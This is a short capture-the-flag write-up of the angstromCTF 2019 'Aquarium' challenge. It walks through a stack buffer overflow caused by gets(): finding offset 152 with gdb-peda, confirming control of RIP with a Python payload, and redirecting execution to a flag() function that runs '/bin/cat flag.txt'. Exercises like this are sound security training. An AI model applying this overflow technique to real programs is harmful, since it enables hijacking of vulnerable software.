Tags: pwn 


# Aquarium
### 50 points, 305 solves

## Description
Here's a nice little [program](https://files.actf.co/7cb4b22337f719a06b0a2e7a5748e548f536150535f5f71b4226ce0204e2c13c/aquarium) that helps you manage your [fish tank](https://files.actf.co/6c6ba382ab8501ce48efb4f3bc8ece68264f07d65c637e2dfc280327a07e1715/aquarium.c)

Run it on the shell server at /problems/2019/aquarium/ or connect with nc shell.actf.co 19305.

The vulnerable code is here
printf("Enter the name of your fish tank: ");
char name[50];

**gets()** has a vulnerability that read all of your input.

Thus, making your program stack filled with your buffer.

According to the source code, we have a function named flag which read the flag.txt

void flag() {
system("/bin/cat flag.txt");

but flag function is not called, but we have gets() so we can overflow the program

and control the eip to jump into flag function

In order to get bufferoverflow offset, I generated payload with peda's patten_create.

gdb-peda$ pattern_create 200
Then, we input the payload while inputting the name of fish tank where gets() is used.

We got SIGSEV Fault. Sounds goood

We check our RSP value and use pattern_offset to get offset.
gdb-peda$ x/wx $rsp
0x7fffffffe058: 0x41417041
gdb-peda$ pattern_offset 0x41417041
1094807617 found at offset: 152
Offset is 152

I test if it were correct with generating payload with python

print "A"*152 + "B"*6
I got
Stopped reason: SIGSEGV
0x0000424242424242 in create_aquarium ()
yay we have control over rip.

then we pack the address of flag function after the offset where rip is controlled.

team3443@actf:/problems/2019/aquarium$ python /tmp/exploit.py | ./aquarium

### Flag

[Original Link](https://github.com/kh4nt99/ctfs/blob/master/angstrom/angstorm2019/aquarium/README.md)

EstherAug. 6, 2021, 5:34 p.m.

/bin/cat flag.txt

EstherAug. 6, 2021, 5:35 p.m.

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